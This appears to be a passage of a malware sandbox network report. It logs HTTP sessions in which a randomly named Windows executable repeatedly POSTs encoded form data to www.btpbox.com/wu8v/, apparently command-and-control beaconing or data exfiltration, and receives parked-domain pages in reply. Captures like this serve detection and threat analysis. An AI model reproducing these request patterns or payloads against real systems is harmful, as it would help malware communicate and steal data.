20 3c 6c 69 6e 6b 20 72 65 6c [TRUNCATED]
                                                                                                                    Data Ascii: d49<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width"><title>.com</title> <link rel="stylesheet" href="http://www.marksmile.com/asset/lp_style.css" ></head><body><div class="main"><a href="https://mail.365.com/login.html" target="_blank"><img src="/file/mail.png" width="100%" height="auto" alt="365" style="position: absolute;top:0;left:0;z-index: 1;"></a><div class="dm" ><h2 id="domain">.com</h2></div><div class="bg"><div class="a"></div><div class="b"></div><div class="c"></div><div class="d"></div></div>...//co--><div class="co"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr><td align="left">:<img src="file/marksmile 1.png" width="76" height="20" alt="" style="position: absolut [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:38.781230927 CEST1289INData Raw: 8d 3a 3c 65 6d 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 22 3e ef bc 88 e8 af b7 e5 a4 87 e6 b3 a8 e5 9f 9f e5 90
                                                                                                                    Data Ascii: :<em style="display: block;font-size: 10px;font-style: normal;"></em><img class="wcode" width="60" height="60" src="http://www.marksmile.com/asset/lp_qrcode.png" id="myImage" /></div></td></tr><tr><td align="left"><div c
                                                                                                                    May 8, 2024 14:07:38.781248093 CEST1018INData Raw: 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 69 6d 61 67 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                    Data Ascii: e="application/javascript"></script><script> var image = document.getElementById("myImage"); // // function createEnlargedContainer() { var container = document.createElement('div
                                                                                                                    May 8, 2024 14:07:38.781259060 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.449776213.36.252.182802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:44.858798027 CEST712OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.btpbox.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.btpbox.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 4b 50 6a 6b 57 65 2b 5a 54 43 52 31 59 79 55 38 43 4c 4c 52 66 2f 67 76 61 6b 50 41 5a 52 59 43 54 2b 49 44 51 49 59 5a 47 6f 52 35 47 67 48 4b 77 65 46 37 49 33 32 70 76 45 59 34 38 36 77 6a 74 68 6f 2b 78 5a 48 34 68 45 6b 45 69 55 6b 4c 4c 6f 5a 52 78 6d 62 33 66 4e 57 61 6d 56 4f 75 51 7a 77 6d 70 57 32 6b 75 75 77 79 63 31 67 2f 76 64 42 45 7a 37 74 57 37 4c 42 61 53 35 4d 6c 79 34 69 52 31 71 2f 31 75 72 4d 58 55 67 32 76 51 39 6a 53 32 57 31 51 59 77 50 57 38 35 35 54 50 51 64 73 79 57 68 46 4d 4b 33 59 4f 77 47 37 36 6a 74 69 34 54 63 4c 69 43 57 51 47 6a 72 69 50 51 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=KPjkWe+ZTCR1YyU8CLLRf/gvakPAZRYCT+IDQIYZGoR5GgHKweF7I32pvEY486wjtho+xZH4hEkEiUkLLoZRxmb3fNWamVOuQzwmpW2kuuwyc1g/vdBEz7tW7LBaS5Mly4iR1q/1urMXUg2vQ9jS2W1QYwPW855TPQdsyWhFMK3YOwG76jti4TcLiCWQGjriPQ==
                                                                                                                    May 8, 2024 14:07:45.162573099 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:45 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5060
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 57 33 43 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 77 77 77 2e 62 74 70 62 6f 78 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 73 2d 72 65 64 69 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 65 6e 72 65 67 69 73 74 72 e9 20 76 69 61 20 6c 65 20 62 75 72 65 61 75 20 64 27 65 6e 72 65 67 69 73 74 72 65 6d 65 6e 74 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="DNSSEC, deposer, enregistrement, protection, serveurs DNS, hbergement, protg, grer, informations, hbergement, domaine parqu, renouvellement, nom de domaine, domaine RE, domaine UK, domaine RE, domaine BE, domaine XXX, domaine INFO, domaine UK, domaine EU, domaine NET, domaine LI, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/log [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:45.162676096 CEST1289INData Raw: 20 6e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 2c 20 70 72 69 78 22 20 62 6f 72 64 65 72 3d 22 30 22 20 68 65 69 67 68 74 3d 22 35 38 22 20 77 69 64 74 68 3d 22 31 38 30 22 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                    Data Ascii: nom de domaine, prix" border="0" height="58" width="180"></a></div> <div id="banniere"><a href="https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.html"><img src="https://parked.reg.bookmyname.com/images/fr_banniere_haut.j
                                                                                                                    May 8, 2024 14:07:45.162693024 CEST1289INData Raw: 42 3e 0a 3c 62 72 3e 26 6e 62 73 70 3b 3c 62 72 3e 0a 4c 65 20 6e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 61 20 e9 74 e9 20 65 6e 72 65 67 69 73 74 72 e9 20 70 61 72 20 75 6e 20 75 74 69 6c 69 73 61 74 65 75 72 20 64 75 20 72 65 67 69 73 74 72
                                                                                                                    Data Ascii: B><br>&nbsp;<br>Le nom de domaine a t enregistr par un utilisateur du registrar <a href='https://www.bookmyname.com/'>BookMyName</a> et est rserv pour une utilisation future.<br>&nbsp;<br><a href='https://www.bookmyname.com/whois_info
                                                                                                                    May 8, 2024 14:07:45.162708044 CEST1289INData Raw: 61 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d
                                                                                                                    Data Ascii: a><a href="http://www.bookmyname.com/"><img src="http://parked.reg.bookmyname.com/images/lien_3.gif" alt="com" border="0" height="28" width="38"></a><a href="http://www.pir.org/" onclick="window.open(this.href); return false;"><img src="http
                                                                                                                    May 8, 2024 14:07:45.162723064 CEST158INData Raw: 72 6e 20 66 61 6c 73 65 3b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 69 65 6e 5f 34 2e 67 69 66 22 20 61 6c 74 3d 22 69 63 61 6e
                                                                                                                    Data Ascii: rn false;"><img src="http://parked.reg.bookmyname.com/images/lien_4.gif" alt="icann" border="0" height="28" width="30"></a></div>--></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.449777213.36.252.182802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:47.702189922 CEST732OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.btpbox.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.btpbox.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 4b 50 6a 6b 57 65 2b 5a 54 43 52 31 65 53 45 38 41 6f 7a 52 55 2f 67 75 56 45 50 41 58 78 59 47 54 2b 4d 44 51 4b 31 45 47 61 46 35 47 42 33 4b 78 63 74 37 50 33 32 70 6e 6b 59 39 34 36 77 6f 74 68 30 32 78 64 48 34 68 48 59 45 69 52 49 4c 4c 37 68 57 6a 47 62 50 58 74 57 55 70 31 4f 75 51 7a 77 6d 70 58 53 4f 75 76 55 79 66 45 51 2f 76 34 68 4c 36 62 74 52 2b 37 42 61 59 5a 4d 68 79 34 69 33 31 72 79 65 75 75 41 58 55 6c 53 76 54 70 50 52 2f 57 31 57 48 41 4f 45 73 4b 59 49 41 77 30 51 73 46 4e 63 48 75 6e 42 47 57 58 68 72 53 4d 31 71 54 34 34 2f 46 66 6b 4c 67 57 72 55 66 61 6f 31 68 6a 43 4d 78 4a 37 62 44 74 41 57 4e 55 4e 51 42 41 3d
                                                                                                                    Data Ascii: MdtlcTm=KPjkWe+ZTCR1eSE8AozRU/guVEPAXxYGT+MDQK1EGaF5GB3Kxct7P32pnkY946woth02xdH4hHYEiRILL7hWjGbPXtWUp1OuQzwmpXSOuvUyfEQ/v4hL6btR+7BaYZMhy4i31ryeuuAXUlSvTpPR/W1WHAOEsKYIAw0QsFNcHunBGWXhrSM1qT44/FfkLgWrUfao1hjCMxJ7bDtAWNUNQBA=
                                                                                                                    May 8, 2024 14:07:48.005851030 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:47 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5055
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 57 33 43 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 77 77 77 2e 62 74 70 62 6f 78 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 73 2d 72 65 64 69 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 65 6e 72 65 67 69 73 74 72 e9 20 76 69 61 20 6c 65 20 62 75 72 65 61 75 20 64 27 65 6e 72 65 67 69 73 74 72 65 6d 65 6e 74 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="renouvellement, grer, enregistrer, renouvellement, hebergement, reserver, protection, enregistrement, IDN, protger, reserver, achat, noms de domaine, domaine CC, domaine CH, domaine CC, domaine CH, domaine ME, domaine ME, domaine RE, domaine ME, domaine IN, domaine CH, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/logo_book.gif" alt [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:48.005868912 CEST1289INData Raw: 20 72 65 64 75 63 74 69 6f 6e 22 20 62 6f 72 64 65 72 3d 22 30 22 20 68 65 69 67 68 74 3d 22 35 38 22 20 77 69 64 74 68 3d 22 31 38 30 22 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 62 61 6e 6e 69 65 72
                                                                                                                    Data Ascii: reduction" border="0" height="58" width="180"></a></div> <div id="banniere"><a href="https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.html"><img src="https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpg" alt="no
                                                                                                                    May 8, 2024 14:07:48.005882025 CEST1289INData Raw: 72 3e 26 6e 62 73 70 3b 3c 62 72 3e 0a 4c 65 20 6e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 61 20 e9 74 e9 20 65 6e 72 65 67 69 73 74 72 e9 20 70 61 72 20 75 6e 20 75 74 69 6c 69 73 61 74 65 75 72 20 64 75 20 72 65 67 69 73 74 72 61 72 20 3c 61
                                                                                                                    Data Ascii: r>&nbsp;<br>Le nom de domaine a t enregistr par un utilisateur du registrar <a href='https://www.bookmyname.com/'>BookMyName</a> et est rserv pour une utilisation future.<br>&nbsp;<br><a href='https://www.bookmyname.com/whois_informati
                                                                                                                    May 8, 2024 14:07:48.005894899 CEST1289INData Raw: 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 69 6d 61 67
                                                                                                                    Data Ascii: href="http://www.bookmyname.com/"><img src="http://parked.reg.bookmyname.com/images/lien_3.gif" alt="com" border="0" height="28" width="38"></a><a href="http://www.pir.org/" onclick="window.open(this.href); return false;"><img src="http://pa
                                                                                                                    May 8, 2024 14:07:48.005906105 CEST153INData Raw: 6c 73 65 3b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 69 65 6e 5f 34 2e 67 69 66 22 20 61 6c 74 3d 22 69 63 61 6e 6e 22 20 62 6f
                                                                                                                    Data Ascii: lse;"><img src="http://parked.reg.bookmyname.com/images/lien_4.gif" alt="icann" border="0" height="28" width="30"></a></div>--></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.449778213.36.252.182802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:50.542541027 CEST10814OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.btpbox.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.btpbox.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 4b 50 6a 6b 57 65 2b 5a 54 43 52 31 65 53 45 38 41 6f 7a 52 55 2f 67 75 56 45 50 41 58 78 59 47 54 2b 4d 44 51 4b 31 45 47 62 39 35 47 33 4c 4b 2b 62 78 37 4f 33 32 70 37 30 59 38 34 36 77 70 74 68 73 79 78 64 4c 4f 68 43 55 45 77 6a 41 4c 61 36 68 57 36 32 62 50 49 64 57 5a 6d 56 50 32 51 7a 68 74 70 57 69 4f 75 76 55 79 66 47 49 2f 6d 4e 42 4c 38 62 74 57 37 4c 42 73 53 35 4e 47 79 34 37 4d 31 72 33 6c 75 64 49 58 55 45 75 76 57 63 6a 52 39 32 31 55 47 41 50 42 73 4b 55 74 41 77 70 68 73 45 35 6d 48 70 58 42 43 78 62 2f 34 32 34 31 33 77 4d 6e 69 6d 7a 50 49 52 32 50 52 75 57 68 34 54 47 5a 66 78 46 4b 5a 68 30 70 4f 66 49 52 4e 30 47 41 43 48 54 6b 45 6d 55 2b 5a 64 35 44 4c 78 33 54 71 54 49 45 6b 62 30 53 72 37 36 62 51 43 77 49 2b 55 67 59 44 79 48 61 49 59 75 4d 79 4e 4e 79 54 62 75 6e 44 34 6b 4d 73 7a 38 32 63 71 68 34 56 72 64 57 69 67 52 75 4d 48 53 54 43 46 7a 35 4a 6d 54 49 7a 71 7a 6b 49 61 6d 52 41 51 31 35 6c 64 48 39 37 57 41 62 37 71 43 68 33 67 50 42 75 36 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=KPjkWe+ZTCR1eSE8AozRU/guVEPAXxYGT+MDQK1EGb95G3LK+bx7O32p70Y846wpthsyxdLOhCUEwjALa6hW62bPIdWZmVP2QzhtpWiOuvUyfGI/mNBL8btW7LBsS5NGy47M1r3ludIXUEuvWcjR921UGAPBsKUtAwphsE5mHpXBCxb/42413wMnimzPIR2PRuWh4TGZfxFKZh0pOfIRN0GACHTkEmU+Zd5DLx3TqTIEkb0Sr76bQCwI+UgYDyHaIYuMyNNyTbunD4kMsz82cqh4VrdWigRuMHSTCFz5JmTIzqzkIamRAQ15ldH97WAb7qCh3gPBu6maDHg6yxmcaBYyuciYuIh2It81fHKc6mfqt7Q+/uE5Jk/2bZEkOJ9gsS06vE+9zApDdIXOPyf1+lD1h8CYp6gfpmj68nCo0Iah/wfZABoZTGL+ajQrbMuaQDC9jo+JdBES+/rtozgbUkKbroweJdQr3reafrne2W9SnQGp5EbLQY/U9RSNBgeDRY9pVjZTXinKYetTqEJDsxe4C3L6xenibCjpyt+l8FMwNBGu6FRU5Pg6wYwlDR1fmgXDiUNzeFxrgNp1DaJNocjiRXvDyH34rZqoHUkhWgR3eoSO5n4oD6aXnIOwTaLOcxdqlX1tyVt3VJ2iHkJDtQBzX3ozwQXkYfcHWcbkf2LrPQ79Sv4Y0oUIMZJkSYgbdQnp71iX8jQzaBs5zQP47ZRLGDmOthqOkFD+6up8MMetf6Oy4nlxcUQ0DWz0761/gVsgWmf53BkL2hjZRprXDo+otPZiBXmZwlqSeIXxYLidtP1pHDo21nTEuecHB+aG1BlGGC4AfSuVTCjFAEkGh1LkbyiLzo+RxvBfrSEw7jBnEn/EQDPAzprUXlt22G4VLFGHBYeGn5VReFyR/j6Ar5t3IFxfFxDbH0Y4pnoLcMsz1ohWSDVngqDBEu2vY8GsfALZI86XsY7APLVQV8CpcBZWWKyN023x9Q9KkMk82ELv [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:50.846993923 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:50 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5056
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 57 33 43 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 77 77 77 2e 62 74 70 62 6f 78 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 73 2d 72 65 64 69 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 65 6e 72 65 67 69 73 74 72 e9 20 76 69 61 20 6c 65 20 62 75 72 65 61 75 20 64 27 65 6e 72 65 67 69 73 74 72 65 6d 65 6e 74 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="parking, protection, renouveler, rserv, redirection mail, protg, serveurs DNS, enregistrer, deposer, verifier, disponible, rserv, nom de domaine, domaine XXX, domaine COM, domaine NET, domaine IN, domaine CH, domaine BE, domaine CC, domaine XXX, domaine NET, domaine RE, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/logo_book.gif [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:50.847049952 CEST1289INData Raw: 20 64 65 20 64 6f 6d 61 69 6e 65 2c 20 70 72 69 78 22 20 62 6f 72 64 65 72 3d 22 30 22 20 68 65 69 67 68 74 3d 22 35 38 22 20 77 69 64 74 68 3d 22 31 38 30 22 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22
                                                                                                                    Data Ascii: de domaine, prix" border="0" height="58" width="180"></a></div> <div id="banniere"><a href="https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.html"><img src="https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpg"
                                                                                                                    May 8, 2024 14:07:50.847062111 CEST1289INData Raw: 62 72 3e 26 6e 62 73 70 3b 3c 62 72 3e 0a 4c 65 20 6e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 61 20 e9 74 e9 20 65 6e 72 65 67 69 73 74 72 e9 20 70 61 72 20 75 6e 20 75 74 69 6c 69 73 61 74 65 75 72 20 64 75 20 72 65 67 69 73 74 72 61 72 20 3c
                                                                                                                    Data Ascii: br>&nbsp;<br>Le nom de domaine a t enregistr par un utilisateur du registrar <a href='https://www.bookmyname.com/'>BookMyName</a> et est rserv pour une utilisation future.<br>&nbsp;<br><a href='https://www.bookmyname.com/whois_informat
                                                                                                                    May 8, 2024 14:07:50.847074986 CEST1289INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 69 6d 61
                                                                                                                    Data Ascii: a href="http://www.bookmyname.com/"><img src="http://parked.reg.bookmyname.com/images/lien_3.gif" alt="com" border="0" height="28" width="38"></a><a href="http://www.pir.org/" onclick="window.open(this.href); return false;"><img src="http://p
                                                                                                                    May 8, 2024 14:07:50.847091913 CEST154INData Raw: 61 6c 73 65 3b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 69 65 6e 5f 34 2e 67 69 66 22 20 61 6c 74 3d 22 69 63 61 6e 6e 22 20 62
                                                                                                                    Data Ascii: alse;"><img src="http://parked.reg.bookmyname.com/images/lien_4.gif" alt="icann" border="0" height="28" width="30"></a></div>--></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.449779213.36.252.182802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
